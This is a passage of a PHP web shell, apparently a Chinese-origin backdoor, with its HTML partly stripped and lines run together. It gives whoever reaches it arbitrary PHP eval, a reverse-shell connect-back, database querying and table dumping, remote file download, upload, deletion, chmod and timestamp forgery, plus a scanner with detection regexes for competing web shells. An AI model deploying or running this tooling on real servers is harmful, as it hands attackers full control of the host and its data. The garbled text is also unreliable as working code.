';
foreach($menu as $key => $name) {
echo ''.$name.' ';
}
echo '
';
echo '';
switch($_POST['go']) {
case "info" :
if(EXISTS_PHPINFO) {
ob_start();
phpinfo(INFO_GENERAL);
$out = ob_get_contents();
ob_end_clean();
$tmp = array();
preg_match_all('/\'.$msg.'
';
echo '| name | parameter |
|---|---|
| '.$name.' | '.$var.' |
'.$res['msg'].'
';
echo '';
break;
case "scan" :
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';
$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';
$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';
echo ''.$msg.'
';
echo '';
if($keyword != '') {
flush();
ob_flush();
echo '';
$incs = $include == '' ? false : explode('|',$include);
$fits = $filters == '' ? false : explode('|',$filters);
$isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir);
echo '
';
}
break;
case "antivirus" :
$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;
$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php');
echo ''.($isread ? '
Search complete
' : 'Search failed
').''.$msg.'
';
echo '';
if(count($_POST['types']) > 0) {
$matches = array(
'php' => array(
'/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i',
'/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i',
'/(udp\:\/\/(.*)\;)+/i',
'/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',
'/preg\_replace\s*\((.*)\(base64\_decode\(\$/i',
'/(eval|assert|include|require)+\s*\((.*)(base64\_decode|file\_get\_contents|php\:\/\/input)+/i',
'/(eval|assert|include|require|array\_map)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i',
'/\$\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\s*\(\s*\$(\w+)\s*\)/i',
'/\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\(\s*\$(.*)\)/i',
'/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,
\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\)/i',
'/(fopen|fwrite|fpust|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\](.*)\)/i',
'/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i',
'/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i',
'/\$(.*)\s*\((.*)\/e(.*)\,
\s*\$\_(.*)\,
(.*)\)/i',
'/\$\_\=(.*)\$\_/i'),
'asp+aspx' => array(
'/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i',
'/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i',
'/(eval|execute)+(.*)request.item\s*\[(.*)\]/i',
'/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i',
'/\';
$isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir);
echo '
';
}
break;
case "phpeval" :
if(isset($_POST['phpcode'])) {
$phpcode = chop($_POST['phpcode']);
ob_start();
if(substr($phpcode,0,2) == '') {
@eval ('?>'.$phpcode.'function runcode(objname) {var winname = window.open('',\"_blank\",'');var obj = document.getElementById(objname);winname.document.open('text/html','replace');winname.opener = null;winname.document.write(obj.value);winname.document.close();}";
echo ''.($isread ? '
Scan complete
' : 'Scan failed
').''.$msg.'
';
echo '';
break;
case "sql" :
if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {
$type = $_POST['type'];
$sqlhost = $_POST['sqlhost'];
$sqluser = $_POST['sqluser'];
$sqlpass = $_POST['sqlpass'];
$sqlname = $_POST['sqlname'];
$sqlcode = $_POST['sqlcode'];
$names = $_POST['names'];
switch($type) {
case "PostgreSql" :
if(function_exists('pg_close')){
if(strstr($sqlhost,':')) {
$array = explode(':',$sqlhost);
$sqlhost = $array[0];
$sqlport = $array[1];
}
else {
$sqlport = 5432;
}
$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");
if($dbconn) {
$msg = '
connect'.$type.' success
'; pg_query('set client_encoding='.$names); $result = pg_query($sqlcode); if($result) { $msg .= '- implement SQL success
'; while($array = pg_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '- implement SQL fail
'; $rows = array('error' => pg_result_error($result)); } pg_free_result($result); } else { $msg = 'connect'.$type.' fail
'; } @pg_close($dbconn); } else { $msg = 'Not supported '.$type.'
'; } break; case "MsSql" : if(function_exists('mssql_close')){ $dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass); if($dbconn) {$msg = 'connect'.$type.' success
'; mssql_select_db($sqlname,$dbconn); $result = mssql_query($sqlcode); if($result) { $msg .= '- implement SQL success
'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '- implement SQL fail
'; } @mssql_free_result($result); } else { $msg = 'connect'.$type.' fail
'; } @mssql_close($dbconn); } else { $msg = 'Not supported '.$type.'
'; } break; case "Oracle" : if(function_exists('oci_close')){ $conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname); if($conn) { $msg = 'connect'.$type.'success
'; $stid = oci_parse($conn,$sqlcode); oci_execute($stid); if($stid) { $msg .= '- implement SQL success
'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } } else { $msg .= '- implement SQL fail
'; $e = oci_error(); $rows = array('error' => $e['message']); } oci_free_statement($stid); } else { $e = oci_error(); $rows = array('error' => $e['message']); $msg = 'connect'.$type.' fail
'; } @oci_close($conn); } else { $msg = 'Not supported '.$type.'
'; } break; case "MySql" : if(function_exists('mysql_close')){ $conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname); if($conn) { $msg = 'connect'.$type.'success
'; if(substr($sqlcode,0,7) == 't00lsa') { $array = array(); $data = ''; $i = 0; preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array); if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) { mysql_select_db($array[1][0],$conn); mysql_query('set names '.$names,$conn); $spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`; '; $result = mysql_query($spidercode,$conn); if($result) { while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join(' |x| ',$row)."\r\n"; $i++; } if($data) { $file = strdir($array[4][0]); $msg .= filew($file,$data,'w') ? '- Successfully de-stocked
' : '- Export file failed
'; $rows = array('file' => $file,size(filesize($file)) => 'Total '.$i.' Data'); } else { $msg .= '- No data
'; } } else { $msg .= '- implement SQL fail
'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } }else { $msg .= '- Error in decommissioning statement
'; } } elseif(!empty($sqlcode)) { mysql_select_db($sqlname,$conn); mysql_query('set names '.$names,$conn); $result = mysql_query($sqlcode,$conn); if($result) { $msg .= '- implement SQL success
'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } } else { $msg .= '- implement SQL fail
'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } } mysql_free_result($result); } else { $msg = 'connect'.$type.' fail
'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } mysql_close($conn); } else { $msg = 'Not supported '.$type.'
'; } break; } } else { $type = 'MySql'; $sqlhost = 'localhost:3306'; $sqluser = 'root'; $sqlpass = '123456'; $sqlname = 'mysql'; $sqlcode = 'select version();'; $names = 'gbk'; } echo ''.$msg.'
';
echo '';
if($rows) {
echo '';
ob_start();
print_r($rows);
$out = ob_get_contents();
ob_end_clean();
if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) {
$out = @iconv('UTF-8','GB2312//IGNORE',$out);
}
echo htmlspecialchars($out);
echo '';
}
break;
case "backshell" :
if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {
$backip = $_POST['backip'];
$backport = $_POST['backport'];
$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';
$type = $_POST['type'];
$msg = backshell($backip,$backport,$temp,$type);
}
else {
$backip = $_SERVER['REMOTE_ADDR'];
$backport = '443';
$temp = '/tmp';
$type = 'pl';
}
echo ''.$msg.'
';
echo '';
break;
case "edit" :
case "editor" :
$file = strdir($_POST['godir'].'/'.$_POST['govar']);
$iconv = function_exists('iconv');
if(!file_exists($file)) {
$msg = '[Create a new file ]';
}
else {
$code = filer($file);
$chst = 'deafult';
if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code) && $iconv) {
$chst = 'utf-8';
$code = @iconv('UTF-8','GB2312//IGNORE',$code);
}
$size = size(filesize($file));
$msg = '[File attributes '.substr(decoct(fileperms($file)),-4).'] [File size '.$size.'] [Fiel Encoding'.$chst.']';
}
// echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');
echo "";
echo ' - '.$msg.'
';
echo '';
echo ' ';
echo '
';
break;
case "upfiles" :
$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];
$msg = '[Maximum upload file '.get_cfg_var("upload_max_filesize").'] [POST maximum submission data '.get_cfg_var("post_max_size").']';
$max = 10;
if(isset($_FILES['uploads']) && isset($_POST['renames'])) {
$uploads = $_FILES['uploads'];
$msgs = array();
for($i = 1; $i < $max; $i++) {
if($uploads['error'][$i] == UPLOAD_ERR_OK) {$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];
$filea = $uploads['tmp_name'][$i];
$fileb = strdir($updir.'/'.$rename);
$msgs[$i] = fileu($filea,$fileb) ? 'Upload success '.$rename.'
' : 'Upload failed '.$rename.'
'; } } } echo ''.$msg.'
';
echo ' ';
echo '
';
break;
default :
if(isset($_FILES['upfile'])) {
if($_FILES['upfile']['name'] == '') { $msg = 'Please select file
'; }else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? 'Uload files'.$rename.' success
' : 'Uload files'.$rename.' fail
'; } } if(isset($_POST['act'])) { switch($_POST['act']) { case "a" : if(!$_POST['files']) { $msg = 'Please select file'.$_POST['var'].'
'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg = $msg = $i ? 'Co-replication'.$i.' Files to'.$_POST['var'].' success
' : 'Co-replication'.$i.' Files to'.$_POST['var'].' fail
'; } break; case "b" : if(!$_POST['files']) { $msg = 'Please select file
'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? 'Total deleted '.$i.' 个文件成功
' : 'Total deleted '.$i.' Files failed
'; } break; case "c" : if(!$_POST['files']) { $msg = 'Please select file'.$_POST['var'].'
'; } else if(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = 'Wrong attribute value
'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? 'Common '.$i.' Modify the properties of the file to'.$_POST['var'].' success
' : 'Common '.$i.' Modify the properties of the file to '.$_POST['var'].' fail
'; } break; case "d" : if(!$_POST['files']) { $msg = 'Please select file'.$_POST['var'].'
'; } elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = 'Wrong time format'.$_POST['var'].'
'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? 'Common '.$i.' File modification time is '.$_POST['var'].' success
' : '¹² '.$i.' File modification time is'.$_POST['var'].' fail
'; } break; case "e" : $path = strdir($nowdir.$_POST['var'].'/'); if(file_exists($path)) { $msg = 'Directory already exists'.$_POST['var'].'
'; } else { $msg = @mkdir($path,0777) ? 'Create directory '.$_POST['var'].' success
' : 'Create directory '.$_POST['var'].' fail
'; } break; case "f" : $context = array('http' => array('timeout' => 30)); if(function_exists('stream_context_create')) { $stream = stream_context_create($context); } $data = @file_get_contents ($_POST['var'],false,$stream); $filename = array_pop(explode('/',$_POST['var'])); if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? 'Download '.$filename.' success
' : 'Download '.$filename.' fail
'; } else { $msg = 'Download failed or download is not supported
'; } break; case "rf" : $files = explode('|x|',$_POST['var']); if(count($files) != 2) { $msg = 'Input error
'; } else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? 'Rename'.$files[1].' 为'.$files[0].' success
' : 'Rename'.$files[1].' for'.$files[0].' fail
'; } break; case "pd" : $files = explode('|x|',$_POST['var']); if(count($files) != 2) { $msg = 'Input error
'; } else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? 'Revise'.$files[1].'The attributes are '.$files[0].' success
' : 'Revise'.$files[1].'The attributes are '.$files[0].' fail
'; } break; case "edit" : if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? 'Saved successfully '.$_POST['filename'].'
' : 'Save failed'.$_POST['filename'].'
'; } break; case "deltree" : $deldir = strdir($nowdir.$_POST['var'].'/'); if(!file_exists($deldir)) { $msg = 'Table of contents'.$_POST['var'].' Does not exist
'; } else { $msg = deltree($deldir) ? 'Deleting a directory'.$_POST['var'].' success
' : 'Deleting a directory'.$_POST['var'].' fail
'; } break; } } $chmod = substr(decoct(fileperms($nowdir)),-4); if(!$chmod) { $msg .= ' -Unable to read directory
'; } $array = showdir($nowdir); $thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/'); $nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22')); echo ''.$msg.'
'; echo '';
echo ' ';
echo ' ';
echo ' ';
echo ' ';
echo '
';
echo '';
break;
}
?>
'.$_SERVER['SERVER_SOFTWARE']; ?>